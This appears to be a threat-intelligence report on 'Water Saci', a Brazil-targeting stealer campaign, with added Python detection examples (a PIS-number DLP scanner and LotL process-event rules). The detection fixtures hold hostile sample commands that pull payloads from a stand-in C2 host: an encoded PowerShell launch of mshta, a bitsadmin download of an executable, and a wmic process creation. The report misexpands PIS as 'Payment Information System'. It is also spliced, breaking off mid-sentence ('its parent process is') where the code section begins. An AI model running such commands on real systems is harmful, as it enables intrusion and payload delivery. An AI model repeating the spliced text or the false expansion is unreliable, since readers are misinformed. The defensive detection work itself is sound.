A newly identified, financially motivated threat actor, tracked as Water Saci, has been linked to a sustained, multi-year campaign primarily targeting Brazil’s financial, e-commerce, telecommunications, and government sectors. This actor, believed to be Portuguese-speaking and Brazilian-based, has been operational since at least July 2019 and has continued its activities through at least February 2024.
The primary objective of Water Saci is financial gain, achieved through the deployment of a custom malware toolkit, including a stealer component tracked as ‘Saci.Stealer’. This campaign is notable for its scale and its highly specific data-targeting objectives. Intelligence indicates the operation has already affected over 1,000 companies and compromised the data of more than 1.5 million individuals.
The stealer malware is explicitly designed to search for and exfiltrate financial data, with a specific and notable focus on information related to Brazil’s PIS (Payment Information System).
The 2019-2024 operational timeline is a critical finding. It indicates that Water Saci is not an emerging, opportunistic threat, but rather a mature, persistent, and stealthy group that has successfully operated below the radar of public threat intelligence for at least five years. This longevity implies a sophisticated understanding of operational security and an ability to maintain long-term access to victim environments. For security operations, this means any incident response or threat-hunting engagement related to this actor must assume a potential compromise timeline measured in years, not days, necessitating a thorough review of historical logs for evidence of intrusion.
Furthermore, the specific targeting of PIS data, as opposed to generic credit card (PCI) or personally identifiable information (PII), signals a highly specialized adversary. This demonstrates a deep, expert-level knowledge of the Brazilian financial ecosystem and its specific data structures. The actor is not engaging in opportunistic, broad-spectrum data theft; they are conducting a surgical operation to acquire a specific dataset, which they have likely already established a clear monetization path for. This specificity also has direct implications for defenders: standard Data Loss Prevention (DLP) policies configured to detect common formats like credit card numbers or Social Security numbers will likely fail to detect the exfiltration of PIS data. Effective defense requires custom DLP signatures and detection rules built to recognize the unique structure and format of PIS data.
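As an added illustration of the custom DLP detection the paragraph above calls for (example code written for this page, not tooling from the report or the actor), the following Python module scans text lines for PIS identifiers. It assumes the identifier is the 11-digit Brazilian PIS/PASEP number, optionally written as NNN.NNNNN.NN-N, and validates the trailing mod-11 check digit (weights 3,2,9,8,7,6,5,4,3,2) so that arbitrary 11-digit strings such as order numbers do not fire the rule; the sample lines and numbers are constructed for the example.

```python
import re

# Candidate PIS/PASEP layout: 11 digits, optionally NNN.NNNNN.NN-N (assumed format).
# Lookarounds keep the match from landing inside a longer digit run (e.g. a card number).
_PIS_RE = re.compile(r"(?<![\d.-])(\d{3})\.?(\d{5})\.?(\d{2})-?(\d)(?![\d.-])")
_WEIGHTS = (3, 2, 9, 8, 7, 6, 5, 4, 3, 2)  # assumed PIS/PASEP check-digit weights


def pis_check_digit(first10: str) -> int:
    """Mod-11 check digit over the first ten digits; 10 or 11 collapse to 0."""
    total = sum(int(d) * w for d, w in zip(first10, _WEIGHTS))
    digit = 11 - (total % 11)
    return 0 if digit > 9 else digit


def is_valid_pis(candidate: str) -> bool:
    digits = re.sub(r"\D", "", candidate)
    # Reject wrong length and degenerate runs like 00000000000 (which pass the checksum).
    if len(digits) != 11 or len(set(digits)) == 1:
        return False
    return pis_check_digit(digits[:10]) == int(digits[10])


def find_pis(text: str) -> list[str]:
    """Return every checksum-valid PIS number in `text`, normalised to bare digits."""
    hits = []
    for m in _PIS_RE.finditer(text):
        digits = "".join(m.groups())
        if is_valid_pis(digits):
            hits.append(digits)
    return hits


def dlp_scan(lines) -> list[tuple[int, list[str]]]:
    """DLP-style pass over outbound lines: (1-based line number, PIS hits) for lines that match."""
    results = []
    for lineno, line in enumerate(lines, start=1):
        hits = find_pis(line)
        if hits:
            results.append((lineno, hits))
    return results


# Constructed sample lines (not real data). 12045678905 carries a valid check digit,
# 12045678906 does not, and 44112233445 is an 11-digit order id that fails the checksum.
SAMPLE_LINES = [
    "nome=Ana Souza;pis=120.45678.90-5;situacao=ativo",
    "export row: 12045678905,ANA SOUZA,2024-01-15",
    "order #44112233445 shipped",
    "card 4111111111111111 declined",
    "pis=12045678906 (typo)",
]

if __name__ == "__main__":
    for lineno, hits in dlp_scan(SAMPLE_LINES):
        print(f"line {lineno}: PIS detected {hits}")
```

The checksum is what makes the rule usable: a bare `\d{11}` pattern would flag line 3 (an order number) and line 5 (a mistyped identifier). Unformatted CPF numbers are also 11 digits, so a check-digit match alone is not proof; in a real policy, pair the rule with field-name context (`pis=`, column headers) before blocking.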
Actor Profile
Water Saci is a sophisticated criminal enterprise characterized by its clear motivation, strong regional nexus, and effective blend of custom and commodity tooling.
- Attribution and Origin: The group is tracked as Water Saci. Analysis of command-line activity and artifacts within their custom scripts reveals the consistent use of Portuguese-language commands and variable names. This linguistic evidence, combined with the group’s exclusive and long-term targeting of Brazilian entities, points with high confidence to a threat actor of Brazilian origin whose operators are native Portuguese speakers.
- Motivation: The actor’s motivation is unequivocally financial. This is demonstrated by their consistent targeting of data-rich financial, e-commerce, and telecommunications entities, and by the core function of their custom Saci.Stealer malware, which is designed to identify and exfiltrate valuable financial and payment system data. This is not an espionage-focused or hacktivist group; it is a professional, for-profit criminal organization.
- Development Capability: Water Saci is not a low-skill actor reliant on purchased or open-source tools. The group maintains and deploys its own custom malware toolkit. This demonstrates a clear in-house software development capability, which allows them to bypass signature-based defenses, rapidly re-tool in response to public disclosures, and craft payloads specifically designed for their targets.
This actor’s operational methodology is defined by a deliberate, hybrid “custom-then-commodity” TTP model. This represents a conscious operational security trade-off. The actor uses their custom ‘Saci’ toolkit for the most critical-path components of their attack, such as the final-stage stealer. This “crown jewel” malware, being unknown to security vendors, has a higher chance of executing successfully.
However, for nearly all other phases of the attack—including execution, defense evasion, persistence, and lateral movement—Water Saci operators rely heavily on “Living off the Land” (LotL) binaries and common administrative tools. They extensively use built-in Windows utilities like powershell.exe, wmic.exe, bitsadmin, and schtasks.exe, as well as common sysadmin tools like PsExec and Remote Desktop Protocol (RDP).
This is a calculated strategy. While the custom malware provides stealth for the payload, the use of commodity tools allows the actor’s post-compromise activity to blend in with the “noise” of legitimate administrative activity. For a SOC, this means that while perimeter defenses might eventually detect the custom malware, the actor, once inside the network, will be exceptionally difficult to distinguish from a systems administrator. This strategy effectively shifts the defensive battleground from the network perimeter to the endpoint, placing the burden of detection on organizations’ ability to log, analyze, and identify anomalous process-level activity and command-line arguments, rather than relying on network-based signatures.
Targeting and Victimology
Water Saci’s targeting is highly focused and geographically concentrated, reflecting its deep understanding of the Brazilian market.
- Geographic Focus: All known victims of the Water Saci campaign are located in Brazil. There is currently no evidence to suggest this actor is operating outside of this geographic boundary.
- Industry Verticals: The actor demonstrates a clear targeting pattern, focusing on data-rich environments where financial information is aggregated. Observed victims fall into four primary sectors:
- Telecommunications
- E-commerce
- Financial Services
- Government
- Scale of Operations: The campaign has achieved a significant scale, impacting over 1,000 companies. The resulting data breach has compromised the personal and financial information of more than 1.5 million individuals.
The breadth of this victimology, spanning from high-security targets like government and financial services to high-volume, lower-security targets like e-commerce, suggests a sophisticated, tiered targeting strategy. Achieving a compromise footprint of over 1,000 companies through individual, “hands-on-keyboard” attacks is resource-intensive and impractical.
A more probable scenario is that Water Saci employs a supply chain or “island hopping” methodology. The actor may initially compromise softer targets, such as smaller e-commerce sites or telecommunications providers, to use as a vector. These initial compromises could serve multiple purposes:
- Credential Harvesting: Steal administrative or user credentials that may be re-used, allowing access to other, higher-value services.
- Island Hopping: Use the compromised partner or supplier organization as a trusted “island” from which to launch subsequent attacks against primary targets (e.g., a financial institution that uses the compromised telecommunications provider for services).
For a SOC at a high-value financial or government target, this implication is critical: their defensive perimeter is not limited to their own infrastructure. The security posture of their third-party partners and suppliers represents a viable and actively exploited attack vector by this threat actor. The 1.5 million compromised individuals are the collateral damage; the 1,000 companies are the primary targets, likely used as both sources of data and stepping stones to one another.
Technical Analysis: Attack Chain
Water Saci’s attack chain is a multi-stage process that leverages commodity vectors for initial access before transitioning to a more sophisticated “Living off the Land” approach for internal movement and execution.
Initial Compromise and Foothold
The actor gains an initial foothold through high-volume, common initial access vectors that target end-users.
- Phishing: The primary vector is phishing emails. These emails use common but effective social engineering lures, such as fake software updates, financial invoices, or payment notifications.
- Payload: The malicious attachments are typically first-stage droppers, such as malicious VBScript (.vbs) or Windows Shortcut (.LNK) files.
- Drive-by Compromise: The actor is also known to use drive-by compromise techniques, likely by compromising legitimate websites to redirect visiting users to actor-controlled infrastructure that delivers the initial payload.
Execution and Defense Evasion
This phase of the attack is “noisy” from a process-logging perspective and provides significant detection opportunities. The actor relies on a core set of Windows scripting engines and LotL binaries.
- Scripting Engines: The initial .vbs payloads are executed via the built-in Windows Script Host engines, wscript.exe and cscript.exe.
- PowerShell: The actor makes extensive use of obfuscated PowerShell commands. The hallmark of their activity is the use of powershell.exe -e (or -encodedcommand). This indicates a Base64-encoded payload, a common technique to achieve fileless execution and bypass simple, signature-based antivirus scanners that look for malicious .ps1 files on disk.
- Living off the Land (LotL) Binaries: Water Saci’s TTPs are characterized by a “holy trinity” of built-in Windows binaries used for defense evasion and payload delivery:
- mshta.exe: This binary is used to download and execute remote HTA (HTML Application) payloads. It is a favored tool for actors as it is a signed, trusted Microsoft binary that can execute script-based logic, often bypassing application whitelisting rules.
- bitsadmin: This command-line tool is used to download subsequent payloads (such as the Saci.Stealer) from C2 infrastructure. The BITS (Background Intelligent Transfer Service) is a legitimate Windows component, and its traffic is often proxied by the OS and trusted by firewalls, making it an effective tool for covertly downloading malware.
- wmic.exe: The actor uses the Windows Management Instrumentation Command-line tool for process creation, specifically via wmic.exe process call create. This is a well-known defense evasion technique. When a process is created with this command, its parent process is
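The endpoint-side detection that the “custom-then-commodity” discussion and the execution-phase list above point to (process image, parent image and command-line arguments rather than network signatures) can be expressed as a small rule set. The following Python is an added example written for this page, not the report’s or any vendor’s detection content. It runs over constructed process-creation events with Sysmon Event ID 1 style field names (Image, ParentImage, CommandLine), decodes the Base64/UTF-16LE payload behind powershell.exe -e so an analyst can read it, and flags the script-host, mshta, bitsadmin and wmic patterns the page names; the hostnames, file paths and encoded command are constructed placeholders.

```python
import base64
import re

# --- Constructed sample telemetry (Sysmon Event ID 1 style fields); not real logs ---
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_WSCRIPT = r"C:\Windows\System32\wscript.exe"
_MSHTA = r"C:\Windows\System32\mshta.exe"
_BITS = r"C:\Windows\System32\bitsadmin.exe"
_WMIC = r"C:\Windows\System32\wbem\WMIC.exe"
_EXPLORER = r"C:\Windows\explorer.exe"


def encode_powershell_command(script: str) -> str:
    """Base64 of UTF-16LE, the form powershell.exe -e expects; used only to build the sample."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


SAMPLE_EVENTS = [
    {"Image": _WSCRIPT, "ParentImage": _EXPLORER,
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\ana\Downloads\fatura_0423.vbs"'},
    {"Image": _PS, "ParentImage": _WSCRIPT,
     "CommandLine": "powershell.exe -nop -w hidden -e "
                    + encode_powershell_command("Start-Process mshta.exe 'http://c2.example.invalid/update.hta'")},
    {"Image": _MSHTA, "ParentImage": _PS,
     "CommandLine": "mshta.exe http://c2.example.invalid/update.hta"},
    {"Image": _BITS, "ParentImage": _MSHTA,
     "CommandLine": r"bitsadmin /transfer upd /download /priority high http://c2.example.invalid/s.dat C:\Users\Public\s.exe"},
    {"Image": _WMIC, "ParentImage": _MSHTA,
     "CommandLine": r'wmic process call create "C:\Users\Public\s.exe"'},
    # Routine admin activity: a script file run from explorer.exe, which must not fire.
    {"Image": _PS, "ParentImage": _EXPLORER,
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
]

# -e, -ec, -enc and -encodedcommand are all accepted spellings of the same switch.
_ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
_URL_RE = re.compile(r"(?i)\bhttps?://\S+")
_SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "mshta.exe")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(b64: str):
    """Recover the script behind -e; None if the argument is not valid Base64/UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(events) -> list[dict]:
    """Apply the LotL rules to each event; return one finding dict per rule hit, in event order."""
    findings = []
    for ev in events:
        image = _basename(ev["Image"])
        parent = _basename(ev.get("ParentImage", ""))
        cmd = ev["CommandLine"]
        if image in ("wscript.exe", "cscript.exe") and ".vbs" in cmd.lower():
            findings.append({"rule": "vbs_script_host", "image": image, "parent": parent, "detail": cmd})
        if image == "powershell.exe":
            m = _ENC_RE.search(cmd)
            if m:
                decoded = decode_encoded_command(m.group(1))
                # A script host as parent is the page's chain (.vbs -> encoded PowerShell); rank it higher.
                rule = "encoded_powershell_from_script_host" if parent in _SCRIPT_HOSTS else "encoded_powershell"
                findings.append({"rule": rule, "image": image, "parent": parent,
                                 "detail": decoded if decoded is not None else "<undecodable>"})
        if image == "mshta.exe" and _URL_RE.search(cmd):
            findings.append({"rule": "mshta_remote_hta", "image": image, "parent": parent, "detail": cmd})
        if image == "bitsadmin.exe" and re.search(r"(?i)/(transfer|download)\b", cmd) and _URL_RE.search(cmd):
            findings.append({"rule": "bitsadmin_download", "image": image, "parent": parent, "detail": cmd})
        if image == "wmic.exe" and re.search(r"(?i)\bprocess\s+call\s+create\b", cmd):
            findings.append({"rule": "wmic_process_create", "image": image, "parent": parent, "detail": cmd})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f['rule']:38} {f['parent']} -> {f['image']}: {f['detail']}")
```

The benign last event shows why the rules key on the encoded-command switch and on parent/child pairs rather than on powershell.exe alone: an administrator running a .ps1 from Explorer produces nothing, while the same binary launched by wscript.exe with a Base64 argument is surfaced together with its decoded contents for triage.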